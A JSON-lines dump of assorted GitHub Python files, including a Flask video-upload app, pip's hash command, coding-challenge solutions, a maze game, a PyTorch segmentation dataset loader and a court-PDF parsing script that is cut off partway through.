bins=np.arange(12) - 0.5, density=True,)\nplt.plot(x_plot, poisson(x_plot, result.x), 'r-', lw=2)\n","repo_name":"Asterics2020-Obelics/School2019","sub_path":"scipy/solution_7.py","file_name":"solution_7.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"32226960235","text":"from flask import Flask, request, render_template, send_from_directory, abort\nimport os\nimport base64\nimport narrator\n\napp = Flask(__name__)\nUPLOAD_FOLDER = None\nFILE_NAME = None\nALLOWED_EXTENSIONS = {'mp4', 'avi', 'mov', 'mkv'}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_video():\n global UPLOAD_FOLDER, FILE_NAME\n if request.method == 'POST':\n unique_id = base64.urlsafe_b64encode(os.urandom(30)).decode(\"utf-8\").rstrip(\"=\")\n dir_path = os.path.join(\"narration\", unique_id)\n os.makedirs(dir_path, exist_ok=True)\n UPLOAD_FOLDER = dir_path\n # Check if the post request has the file part\n if 'file' not in request.files:\n return 'No file part in the request'\n file = request.files['file']\n if file.filename == '':\n return 'No selected file'\n if file and allowed_file(file.filename):\n filepath = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(filepath)\n FILE_NAME = file.filename\n generate_video(video_path=filepath)\n\n return render_template('index.html')\n\n@app.route('/generate', methods=['POST'])\ndef generate_video(video_path):\n global UPLOAD_FOLDER\n # Call the processing function from narrator.py\n # Adjust this part to handle the processing and store the processed video in PROCESSED_FOLDER\n processed_video_path = narrator.process_video(video_path,UPLOAD_FOLDER)\n return 'Processing started' # Adjust as needed\n\n@app.route('/download')\ndef download_file():\n global UPLOAD_FOLDER, FILE_NAME\n filename = f'{FILE_NAME}_out.mp4'\n try:\n return send_from_directory(UPLOAD_FOLDER, filename, as_attachment=True)\n except FileNotFoundError:\n abort(404)\n\nif __name__ == '__main__':\n app.run(debug=True) # Set debug=False in a production environment\n","repo_name":"Addy-codes/Insightful-Echo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37877073765","text":"import hashlib\nimport logging\nimport sys\nfrom optparse import Values\nfrom pip._internal.cli.base_command import Command\nfrom pip._internal.cli.status_codes import ERROR, SUCCESS\nfrom pip._internal.utils.hashes import FAVORITE_HASH, STRONG_HASHES\nfrom pip._internal.utils.misc import read_chunks, write_output\nfrom typing import List\n\nlogger = logging.getLogger(__name__)\n\n\nclass HashCommand(Command):\n \"\"\"\n Compute a hash of a local package archive.\n\n These can be used with --hash in a requirements file to do repeatable\n installs.\n \"\"\"\n\n usage = '%prog [options] ...'\n ignore_require_venv = True\n\n def add_options(self):\n # type: () -> None\n self.cmd_opts.add_option(\n '-a', '--algorithm',\n dest='algorithm',\n choices=STRONG_HASHES,\n action='store',\n default=FAVORITE_HASH,\n help='The hash algorithm to use: one of {}'.format(\n ', '.join(STRONG_HASHES)))\n self.parser.insert_option_group(0, self.cmd_opts)\n\n def run(self, options, args):\n # type: (Values, List[str]) -> int\n if not args:\n self.parser.print_usage(sys.stderr)\n return ERROR\n\n algorithm = options.algorithm\n for path in args:\n write_output('%s:\\n--hash=%s:%s',\n path, algorithm, _hash_of_file(path, algorithm))\n return SUCCESS\n\n\ndef _hash_of_file(path, algorithm):\n # type: (str, str) -> str\n \"\"\"Return the hash digest of a file.\"\"\"\n with open(path, 'rb') as archive:\n hash = hashlib.new(algorithm)\n for chunk in read_chunks(archive):\n hash.update(chunk)\n return hash.hexdigest()\n","repo_name":"myawnhc/MSF","sub_path":"venv/lib/python3.8/site-packages/pip/_internal/commands/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25619308798","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n m, n = map(int, input().split())\n \n input_array = []\n # input 받는 부분\n for i in range(m):\n lst = list(map(int, input().split()))\n input_array.append(lst)\n \n maximum = 0\n for i in range(m-n+1):\n for j in range(m-n+1):\n total = 0\n for a in range(i, i+n):\n for b in range(j, j+n):\n total += input_array[a][b]\n if total > maximum:\n maximum = total\n print(\"#%d %d\" % (test_case, maximum))\n","repo_name":"minnczi/Algorithm","sub_path":"Swea/swea_2001.py","file_name":"swea_2001.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505911054","text":"def get_row(indexY, rows):\n return rows[indexY]\n\n\ndef check_lever(directions):\n return \"L\" in directions\n\n\ndef print_directions(directions):\n string = \"\"\n for direction in directions:\n if direction == \"N\":\n string += f\"({direction})orth\"\n\n elif direction == \"S\":\n string += f\"({direction})outh\"\n\n elif direction == \"E\":\n string += f\"({direction})ast\"\n\n elif direction == \"W\":\n string += f\"({direction})est\"\n if direction != \"L\":\n string += \" or \"\n\n # Til að taka út síðasta \"or\" og bæta við \".\"\n return string[:-4] + \".\"\n\n\ndef get_directions(indexX, row):\n return row[indexX]\n\ndef can_move_to_direction(indexX, row, direction):\n directions = get_directions(indexX, row)\n\n return direction in directions\n\n\ndef get_new_position_for_direction(direction, indexX, indexY):\n if direction == \"N\":\n return indexX, indexY + 1\n elif direction == \"S\":\n return indexX, indexY - 1\n elif direction == \"W\":\n return indexX - 1, indexY\n elif direction == \"E\":\n return indexX + 1, indexY\n\ndef play():\n coins = 0\n indexX = 0\n indexY = 0\n rows = [[\"ES\", \"EWL\", \"SW\"],\n [\"NESL\", \"SWL\",\"NSL\"],\n [\"N\", \"N\", \"V\"]]\n rows.reverse()\n\n valid = True\n while True:\n curr_row = get_row(indexY, rows)\n directions = get_directions(indexX, curr_row)\n if directions == \"V\":\n print(f\"Victory! Total coins {coins}.\")\n\n return input(\"Play again (y/n): \").lower() == \"y\"\n\n if check_lever(directions) and valid:\n choice = input(\"Pull a lever (y/n): \")\n\n if choice.lower() == \"y\":\n coins += 1\n print(f\"You received 1 coin, your total is now {coins}.\")\n\n\n print(\"You can travel:\", print_directions(directions))\n\n direction = input(\"Direction: \")\n direction = direction.upper()\n\n if can_move_to_direction(indexX, curr_row, direction):\n indexX, indexY = get_new_position_for_direction(direction, indexX, indexY)\n valid = True\n else:\n print(\"Not a valid direction!\")\n valid = False\n\ndef main():\n while play():\n pass\n\nmain()","repo_name":"Illugi317/forritun","sub_path":"Unsorted/Tile2.py","file_name":"Tile2.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23449764611","text":"with open(\"A-large.in\") as f:\n input_Arr = f.readlines()\nwith open(\"output.txt\",\"w\") as g:\n for q in range(int(input_Arr[0])):\n inp=input_Arr[q+1].split(' ')\n cur=0\n needed=0\n for c in range(len(inp[1])-1):\n cur+=int(inp[1][c])\n if (c+1)>cur:\n needed+=1\n cur+=1\n outp='Case #'+str(q+1)+': '+str(needed)+'\\n'\n g.write(outp)\n \n \n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1674.py","file_name":"1674.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10640065312","text":"import os\nimport json\nimport geopandas as gpd\nfrom shapely.geometry import Point\n\n\ndef read_stations_osm_format(city_name, grid, engine_type):\n\n stations_path = os.path.join(\n os.path.dirname(os.path.dirname(__file__)),\n \"city_data_manager\",\n \"data\",\n city_name,\n \"raw\",\n \"geo\",\n \"openstreetmap\",\n \"station_locations.json\"\n )\n f = open(stations_path, \"r\")\n station_locations = json.load(f)\n f.close()\n charging_points = station_locations[city_name][engine_type]\n points_list = []\n\n for point in charging_points.keys():\n points_list.append(\n {\n \"geometry\": Point(\n charging_points[point][\"longitude\"], charging_points[point][\"latitude\"]\n ),\n \"n_poles\": charging_points[point][\"n_poles\"]\n }\n )\n stations_gdf = gpd.GeoDataFrame(points_list)\n n_poles_by_zone = {}\n tot_n_poles = 0\n for (p, n) in zip(stations_gdf.geometry, stations_gdf.n_poles):\n for (geom, zone) in zip(grid.geometry, grid.zone_id):\n if geom.intersects(p):\n if zone in n_poles_by_zone.keys():\n n_poles_by_zone[zone] += n\n else:\n n_poles_by_zone[zone] = n\n tot_n_poles += n\n return n_poles_by_zone, stations_gdf, tot_n_poles\n","repo_name":"SmartData-Polito/odysseus","sub_path":"odysseus/supply_modelling/service_stations/service_stations_utils.py","file_name":"service_stations_utils.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"6911397132","text":"import elephant\nimport neo\nfrom scipy import signal\nfrom quantities import ms, Hz, uV, s, V\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom neo.io.nixio import NixIO\nfrom neo.core import AnalogSignal, SpikeTrain, IrregularlySampledSignal\nimport h5py\nfrom itertools import groupby\nfrom ceed.analysis import CeedDataReader\nfrom ephys_analysis.ceed_scripts.ceed_stimulus import get_all_exps, write_exp_df_to_excel\nimport sys\nimport pandas as pd\n\n\ndef fix_h5_alignment_odor_series(h5_file, exp_df, drop_exps=None, wait_time=1*s, stage=\"Odor series\", fs=20000*Hz,\n substage_durations=[5, 25, 5, 25, 5, 25, 5],\n intensities=[34.6875, 0, 34.6875, 0, 69.375, 0, 69.375]):\n \"\"\"\n Aligns CEED data with MCS data from the merged h5 file when the merge script fails to align properly.\n\n EXAMPLE:\n h5_filename = base_filename.format(wave_clus=\"\", electrode=\"\", ext=\"h5\")\n\n \"\"\"\n\n period = (1/fs).rescale(s).item()\n wait_time = wait_time.rescale(s).item()\n\n f = h5py.File(h5_file, 'r')\n dig_io = f[\"data\"][\"mcs_data\"][\"data_arrays\"][\"digital_io\"][\"data\"].value\n\n stim = np.where(dig_io != 0)[0] # When (in samples) the projector is projecting some light pattern\n\n stim_delta_samples = np.diff(stim)\n non_contig = np.where(stim_delta_samples > 1) # When (in samples) the projected pattern changes, by index of stim/stim_delta\n\n stim = stim[non_contig].tolist()\n stim_times = [x * period for x in stim]\n stim_times = np.array(stim_times)\n stim_delta_times = np.diff(stim_times)\n\n deltas_over_wait = np.where(stim_delta_times > wait_time)\n stim = np.array(stim)\n times_over_wait = stim_times[deltas_over_wait]\n\n stage_df = exp_df[exp_df['stage']==stage]\n stage_exps = stage_df['experiment'].unique().tolist()\n\n stage_exps = [int(stage_exp) for stage_exp in stage_exps]\n stage_exps.sort()\n stage_exps = [str(stage_exp) for stage_exp in stage_exps]\n\n if len(stage_exps) != len(times_over_wait):\n times_over_wait = times_over_wait[(len(times_over_wait)-len(stage_exps)):]\n\n\n for i, exp in enumerate(stage_exps):\n i, exp = int(i), int(exp)\n no_times = exp_df.index[(exp_df['experiment'] == exp) & (pd.isna(exp_df['t_start']))].tolist()\n print(no_times)\n if len(no_times) == 0:\n continue\n else:\n t_start = times_over_wait[i] * s\n substage_counter = 0\n for no_time in no_times:\n exp_df.loc[no_time, 't_start'] = t_start\n exp_df.loc[no_time, 't_stop'] = t_start + substage_durations[substage_counter] * s\n exp_df.loc[no_time, 'intensity'] = intensities[substage_counter]\n t_start = t_start + substage_durations[substage_counter] * s\n substage_counter += 1\n return exp_df\n\n\ndef fix_h5_alignment_single_stimuli(h5_file, exp_df, drop_exps=None, wait_time=1*s, stage=\"Odor A, strong\", fs=20000*Hz,\n stimulus_duration=5*s, intensity=69.375):\n \"\"\"\n Aligns CEED data with MCS data from the merged h5 file when the merge script fails to align properly.\n\n EXAMPLE:\n h5_filename = base_filename.format(wave_clus=\"\", electrode=\"\", ext=\"h5\")\n\n \"\"\"\n if drop_exps is not None:\n for exp in drop_exps:\n exp_df = exp_df.drop(exp)\n\n period = (1/fs).rescale(s).item()\n wait_time = wait_time.rescale(s).item()\n\n f = h5py.File(h5_file, 'r')\n dig_io = f[\"data\"][\"mcs_data\"][\"data_arrays\"][\"digital_io\"][\"data\"].value\n\n stim = np.where(dig_io != 0)[0] # When (in samples) the projector is projecting some light pattern\n\n stim_delta_samples = np.diff(stim)\n non_contig = np.where(stim_delta_samples > 1) # When (in samples) the projected pattern changes, by index of stim/stim_delta\n\n stim = stim[non_contig].tolist()\n stim_times = [x * period for x in stim]\n stim_times = np.array(stim_times)\n stim_delta_times = np.diff(stim_times)\n\n deltas_over_wait = np.where(stim_delta_times > wait_time)\n times_over_wait = stim_times[deltas_over_wait]\n stage_df = exp_df[exp_df['stage']==stage]\n stage_exps = stage_df['experiment'].unique().tolist()\n\n if len(stage_exps) == 0:\n raise Exception(\"There are no experiments found with the given stage!\")\n if len(stage_exps) != len(times_over_wait):\n raise Exception(\"The given stage has been found \" + str(len(stage_exps)) + \" times in the metadata, but has \" +\n \"been detected \" + str(len(times_over_wait)) + \" times in the recording!\")\n\n for i, exp in enumerate(stage_exps):\n i, exp = int(i), int(exp)\n no_times = exp_df.index[(exp_df['experiment'] == exp) & (pd.isna(exp_df['t_start']))].tolist()\n\n if len(no_times) == 0:\n continue\n else:\n t_start = times_over_wait[i] * s\n for no_time in no_times:\n exp_df.loc[no_time, 't_start'] = t_start\n exp_df.loc[no_time, 't_stop'] = t_start + stimulus_duration\n exp_df.loc[no_time, 'intensity'] = intensity\n return exp_df\n\n\n\n","repo_name":"mgm248/sliceAnalysis","sub_path":"Jesse/file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74895638273","text":"\"\"\"\ncumulus\nUsage:\n cumulus start [...] [--latest]\n cumulus init (...) [--clean] [--project-name=]\n cumulus stop\n cumulus kill\n cumulus restart [...]\n cumulus logs [] [-f]\n cumulus shell [] [--shell=]\n cumulus -h | --help\n cumulus --version\nOptions:\n -h --help Show this screen.\n --version Show version.\nExamples:\n cumulus start\n cumulus start django\n cumulus init django, mysql\n cumulus stop\n cumulus kill\n cumulus restart --all --clean\n cumulus logs -f\n cumulus shell django --shell=zsh\nHelp:\n For bugs using this tool, please open an issue on the Github repository:\n https://github.com/fattouche/stratocumulus\n\"\"\"\n\nfrom inspect import getmembers, isclass\nfrom docopt import docopt\nimport os\nimport subprocess\nimport prerequisite\nfrom collections import defaultdict\n\nfrom helpers import *\n\nSTART_SHELL = \"./start_shell.sh\"\nDOCKER_HUB = \"strcum/\"\nDOCKER_COMPOSE = \"docker-compose\"\nENTRYPOINT = \"./docker_entrypoint.sh\"\nLOGFILE = \"docker-compose-log.out\"\nVERSION = '1.0.0'\nPORTS = {\"django\": \"41000\", \"rails\": \"41001\",\n \"redis\": \"6379\", \"mysql\": \"3306\", \"elasticsearch\": \"9200\", \"memcached\": \"11211\"}\nCOMMANDS = {\"django\": \"python manage.py runserver 0:{0}\".format(PORTS[\"django\"]),\n \"rails\": \"rails server -p {0} -b 0.0.0.0\".format(PORTS[\"rails\"]),\n \"mysql\": \"mysqld\"}\nDOCKER_COMPOSE_VERSION = '3.6'\n\n\ndef main():\n \"\"\"Main CLI entrypoint.\"\"\"\n import commands\n prerequisite.check_docker()\n options = docopt(__doc__, version=VERSION)\n for (k, v) in options.items():\n if hasattr(commands, k) and v:\n module = getattr(commands, k)\n commands = getmembers(module, isclass)\n command = [command[1]\n for command in commands if command[0] != 'Base'][0]\n command = command(options)\n command.run()\n return\n\n exit(__doc__)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Fattouche/Stratocumulus","sub_path":"src/cumulus/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27353196587","text":"from math import sqrt\n\n\ndef in_circles(x, y, r1, r2, x_center, y_center):\n \"\"\"Determines whether or not a pixel [x,y] is contained within two circles of radius r1 and r2,\n spanned from the center of an image with center pixel [x_center, y_center]\n :param x: x coordinate of the pixel\n :param y: y coordinate of the pixel\n :param r1: radius of the inner circle\n :param r2: radius of the outer circle\n :param x_center: x coordinate of the center of the image\n :param y_center: y coordinate of the center of the image\n :return: True if pixel is contained within the two circles\n \"\"\"\n x_dist = abs(x-x_center)\n y_dist = abs(y-y_center)\n r = sqrt(x_dist*x_dist + y_dist*y_dist)\n return r1 < r < r2\n","repo_name":"CasperKoning/circle-visuals","sub_path":"circle_utils.py","file_name":"circle_utils.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13723719851","text":"import logging\nimport os\nfrom os import listdir\nfrom os.path import splitext\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, random_split\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as TF\nimport copy\nimport pathlib\n\nfrom utils import *\n\nfrom unet.unet_model import *\nfrom transunet import MyTransUNet, MyTransUNet2\nimport re\n\n\nclass BasicDataset(Dataset):\n def __init__(self, images_dir: str, masks_dir: str, scale: float = 1.0, mask_suffix: str = '', resize=None,\n transform=None):\n \"\"\"\n resize: tuple, eg:(128,128)\n \"\"\"\n self.images_dir = Path(images_dir)\n self.masks_dir = Path(masks_dir)\n assert 0 < scale <= 1, 'Scale must be between 0 and 1'\n self.scale = scale\n self.mask_suffix = mask_suffix\n\n self.ids = [splitext(file)[0] for file in listdir(images_dir) if not file.startswith('.')]\n if not self.ids:\n raise RuntimeError(f'No input file found in {images_dir}, make sure you put your images there')\n logging.info(f'Creating dataset with {len(self.ids)} examples')\n\n self.resize = resize\n\n def __len__(self):\n return len(self.ids)\n\n @staticmethod\n def preprocess(tmp, scale, is_mask, resize=None):\n img = tmp.copy()\n img_format = img.format\n w, h = img.size\n if resize is None:\n newW, newH = int(scale * w), int(scale * h)\n assert newW > 0 and newH > 0, 'Scale is too small, resized images would have no pixel'\n img = img.resize((newW, newH))\n else:\n img = img.resize(resize)\n\n if is_mask:\n if img_format == 'PNG' or img_format == 'TIFF' or img_format == 'JPEG': # 將bool array轉為0,1 array\n # img = img.convert('1')\n img_ndarray = np.asarray(img.convert('1')) * 1\n else:\n img_ndarray = np.asarray(img)\n else:\n img_ndarray = np.asarray(img)\n\n # only 2 dim\n if img_ndarray.ndim == 2 and not is_mask:\n img_ndarray = img_ndarray[np.newaxis, ...]\n elif not is_mask:\n img_ndarray = img_ndarray.transpose((2, 0, 1))\n if not is_mask:\n img_ndarray = img_ndarray / 255\n\n return img_ndarray\n\n @staticmethod\n def preprocess2(tmp, scale, is_mask, resize=None):\n img = copy.deepcopy(tmp)\n if is_mask:\n w, h = img.shape\n else:\n w, h, c = img.shape\n if resize is None:\n newW, newH = int(scale * w), int(scale * h)\n assert newW > 0 and newH > 0, 'Scale is too small, resized images would have no pixel'\n img = cv2.resize(img, (newW, newH), interpolation=cv2.INTER_CUBIC)\n else:\n img = cv2.resize(img, resize, interpolation=cv2.INTER_CUBIC)\n\n if is_mask: # 確保mask的值是0 or 1\n img = np.where(img >= 1, 1, 0)\n # (_, img) = cv2.threshold(img, 125, 1, cv2.THRESH_BINARY)\n\n if not is_mask:\n # img = img / 255\n transform = T.Compose([\n T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225],\n ),\n ])\n img = transform(img)\n elif is_mask:\n transform = T.Compose([\n T.ToTensor(),\n ])\n img = transform(img)\n\n # only 2 dim\n if img.ndim == 2 and not is_mask:\n # img = img[np.newaxis, ...]\n img = torch.unsqueeze(img, 0)\n # elif not is_mask:\n # img = img.transpose((2, 0, 1))\n # img = img.transpose(0, 1)\n return img\n\n def transform(self, image, mask, resize=(300, 300)):\n\n # Transform to tensor\n img_transform = T.Compose([\n T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225],\n ),\n ])\n image = img_transform(image)\n\n mask_transform = T.Compose([\n T.ToTensor(),\n ])\n # (_, mask) = cv2.threshold(mask, 1, 1, cv2.THRESH_BINARY)\n mask = np.where(mask >= 1, 1, 0)\n mask = mask_transform(mask)\n\n # Resize\n resize = T.Resize(size=resize)\n image = resize(image)\n mask = resize(mask)\n\n ### Random crop\n # i, j, h, w = T.RandomCrop.get_params(\n # image, output_size=(512, 512))\n # image = TF.crop(image, i, j, h, w)\n # mask = TF.crop(mask, i, j, h, w)\n\n # Random horizontal flipping\n if random.random() > 0.5:\n image = TF.hflip(image)\n mask = TF.hflip(mask)\n\n # Random vertical flipping\n if random.random() > 0.5:\n image = TF.vflip(image)\n mask = TF.vflip(mask)\n\n # image = TF.to_tensor(image)\n # mask = TF.to_tensor(mask)\n return image, mask\n\n @staticmethod\n def load(filename, is_mask=False):\n ext = splitext(filename)[1]\n try:\n if ext in ['.npz', '.npy']:\n return Image.fromarray(np.load(filename))\n elif ext in ['.pt', '.pth']:\n return Image.fromarray(torch.load(filename).numpy())\n elif ext in ['.gif']:\n if not is_mask:\n return np.asarray(Image.open(filename))\n else:\n return np.asarray(Image.open(filename).convert('L'))\n else:\n if not is_mask:\n tmp = cv2.imread(str(filename), cv2.IMREAD_COLOR)\n tmp = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n # tmp = tmp[:, :, [2, 1, 0]]\n return tmp\n else:\n return cv2.imread(str(filename), cv2.IMREAD_GRAYSCALE)\n except:\n logging.error(\"image {} loading encounter error\".format(splitext(filename)[0]))\n\n def __getitem__(self, idx):\n name = self.ids[idx]\n mask_file = list(self.masks_dir.glob(name + self.mask_suffix + '.*'))\n img_file = list(self.images_dir.glob(name + '.*'))\n # print(\"mask dir: {}\".format(self.masks_dir))\n # print(\"image dir: {}\".format(self.images_dir))\n assert len(img_file) == 1, f'Either no image or multiple images found for the ID {name}: {img_file}'\n assert len(mask_file) == 1, f'Either no mask or multiple masks found for the ID {name}: {mask_file}'\n pil_img = self.load(img_file[0])\n pil_mask = self.load(mask_file[0], is_mask=True)\n # pil_img = Image.open(img_file[0])\n # pil_mask = Image.open(mask_file[0]).convert('L')\n img = None\n mask = None\n try:\n # img = self.preprocess2(pil_img, self.scale, is_mask=False, resize=self.resize, )\n # mask = self.preprocess2(pil_mask, self.scale, is_mask=True, resize=self.resize, )\n img, mask = self.transform(pil_img, pil_mask)\n except:\n print(\"encounter error during preprocess : {}\".format(name))\n raise RuntimeError\n\n # rtn_image = torch.as_tensor(copy.deepcopy(img)).float().contiguous()\n # rtn_mask = torch.as_tensor(copy.deepcopy(mask)).long().contiguous()\n\n diff = np.setdiff1d(np.unique(mask), np.array([0, 1]))\n assert diff.size == 0, \"value not match, diff:{}\".format(diff)\n return {\n 'image': img,\n 'mask': mask\n }\n\n\nclass CarvanaDataset(BasicDataset):\n def __init__(self, images_dir, masks_dir, scale=1, resize=False):\n if not resize:\n super().__init__(images_dir, masks_dir, scale, mask_suffix='_mask')\n else:\n super().__init__(images_dir, masks_dir, scale, mask_suffix='_mask', resize=(256, 256))\n\n\nclass ForgeDataset(BasicDataset):\n def __init__(self, images_dir, masks_dir, scale=1, mask_suffix='', resize=(256, 256)):\n super().__init__(images_dir, masks_dir, scale, mask_suffix=mask_suffix, resize=resize)\n\n\nif __name__ == \"__main__\":\n print(\"___main___\")\n ################################### Test ForgeDataset ########################################################\n ROOT_PATH = str(pathlib.Path().resolve().parent)\n # CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\n ## test dataset valid\n DATASETS_DIR = Path(r'F:\\datasets')\n # DATASETS_DIR = Path('/media/ian/WD/datasets')\n dir_img = DATASETS_DIR.joinpath('COCO', 'coco2017_large_cm', 'A', 'train')\n dir_mask = DATASETS_DIR.joinpath('COCO', 'coco2017_large_cm', 'B', 'train')\n dir_checkpoint = Path(r'.\\checkpoints_big_coco_forge(UNet)')\n dataset = ForgeDataset(dir_img, dir_mask, 1, mask_suffix='', resize=(256, 256))\n loader_args = dict(batch_size=2, num_workers=4, pin_memory=True)\n dataloader = DataLoader(dataset, shuffle=True, **loader_args)\n dataiter = iter(dataloader)\n idx = 0\n while True:\n try:\n features, labels = next(dataiter)\n print('number: {}'.format(idx))\n idx += 1\n except StopIteration:\n break\n features, labels = dataiter.next()\n\n #################################################################################################################\n # random_index = int(np.random.random() * len(dataset))\n # single_example = dataset[random_index]\n # true_mask = single_example['mask']\n # img = single_example['image']\n # img = img.unsqueeze(dim=0)\n # model = 'Unet'\n # latest_model, latest_epoch = find_latest_epoch(\n # os.path.join(ROOT_PATH, 'result', 'logs', 'large_cm', model, ))\n # if model == 'Unet':\n # net = Unet(n_channels=3, n_classes=1)\n # elif model == 'Res_Unet':\n # net = Res_Unet(n_channels=3, n_classes=1)\n # elif model == 'Ringed_Res_Unet':\n # net = Ringed_Res_Unet(n_channels=3, n_classes=1)\n # elif model == 'TransUnet':\n # net = MyTransUNet(in_channels=3, classes=1)\n # net.load_state_dict(torch.load(latest_model))\n # with torch.no_grad():\n # pred_mask = net(img)\n # pred_mask = torch.sigmoid(pred_mask).squeeze().cpu()\n # true_mask = true_mask.squeeze()\n # print(img.size())\n # print(pred_mask.size())\n # print(true_mask.size())\n #################################################################################################################\n # masks = list(Path(dir_mask).glob(\"*.*\"))\n # print(len(masks))\n # print(os.system('who am i'))\n # output = os.popen('whoami')\n #################################################################################################################\n # f = open(\"/media/ian/WD/datasets/carvana-image-masking/train_masks/aa1\", \"r\")\n # print(f.read())\n #################################################################################################################\n # print(output.read())\n # dirname = os.path.dirname(__file__)\n # FILE_PATH3 = '/tmp/f1eb080c7182_15_mask.gif'\n # FILE_PATH = '/media/ian/WD/datasets/carvana-image-masking/train_masks/fff9b3a5373f_16_mask.gif'\n # FILE_PATH2 = '/media/ian/WD/datasets/carvana-image-masking/train/f1eb080c7182_15.gif'\n # print(os.path.exists(os.path.join(dirname, FILE_PATH)))\n # img = cv2.imread(FILE_PATH, cv2.IMREAD_COLOR)\n # img = Image.open(\"/tmp/f1eb080c7182_15_mask.gif\")\n # print(img)\n #################################################################################################################\n # test_img = r'I:\\datasets\\big_coco_forge\\images\\000000.jpg'\n # pil_img = np.asarray(Image.open(test_img))\n # cv_img = cv2.imread(test_img)\n # # cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n # cv_img = cv_img[:, :, [2, 1, 0]]\n # unique, counts = np.unique((pil_img == cv_img), return_counts=True)\n # print(dict(zip(unique, counts)))\n","repo_name":"SYLin117/RRU-Net","sub_path":"utils/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296980369","text":"\"\"\"\n250. Count Univalue Subtrees\nhttps://leetcode.com/problems/count-univalue-subtrees/\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def countUnivalSubtrees(self, root: TreeNode) -> int:\n self.count = 0\n self.dfs(root)\n return self.count\n\n # DFS - Postorder Traversal\n # If at least one child is \"True\" and root.val is equal to that child's value,\n # then root node is uniValue subtree node.\n # O(n) time complexity to traverse all roots\n # O(1) space complexity with recursion stack depth O(n)\n def dfs(self, root):\n if not root: return True\n l, r = self.dfs(root.left), self.dfs(root.right)\n l_match = (not root.left) or (root.left.val == root.val)\n r_match = (not root.right) or (root.right.val == root.val)\n if l and r and l_match and r_match:\n self.count += 1\n return True\n return False\n","repo_name":"mathvolcano/leetcode","sub_path":"0250_countUnivalSubtrees.py","file_name":"0250_countUnivalSubtrees.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28557251408","text":"import csv\nimport os \nimport glob\nimport pdb\nimport time\nimport tika\ntika.initVM()\nimport string\nimport re\nfrom tika import parser\nimport difflib\nfrom difflib import SequenceMatcher\ncsv_file = open('Bombay_high_court_input_2021_1.csv','r')\nreader = csv.reader(csv_file)\ndir_1 = '/home/imti/BombayHighcourtpdfs_1'\ndata_main_2 = []\nfor i in reader:\n Court = []\n Court.append(i[0])\n Journal_Reference = []\n Journal_Reference.append(i[1])\n Bench = []\n Bench.append(i[2])\n Applleant = []\n Applleant.append(i[3])\n Respondent = []\n Respondent.append(i[4])\n Judges = []\n Judges.append(i[5])\n Case_Number = []\n Case_Number.append(i[6])\n Decision_Date = []\n Decision_Date.append(i[7])\n data_excel_main = Court+Journal_Reference+Bench+Applleant+Respondent+Judges+Case_Number+Decision_Date\n data_main_2.append(data_excel_main)\ndata_main_2.pop(0)\nfor elem_list in data_main_2:\n data_lower_1 = [i.lower() for i in elem_list]\n data_strip = [i.strip() for i in data_lower_1]\n data_strip_1 = [\"\".join(string.split()) for string in data_strip]\n flag = False\n for path, subdirs, files in os.walk(dir_1):\n if flag == True:\n break\n for name in files:\n if flag == True:\n break\n file_data = parser.from_file(os.path.join(path, name))\n text = file_data['content']\n print(name)\n data1 = text.strip('\\n')\n data = text.splitlines()\n data_2 = [x.strip() for x in data if x]\n data_4 = [x for x in data_2 if len(x) != 1]\n data_5 = [x.replace('\\xa0','') for x in data_4 if x]\n data_6 = [x.replace('\\xad','') for x in data_5 if x]\n flag = True\n Judgement_data = []\n data_pdf = []\n for i in 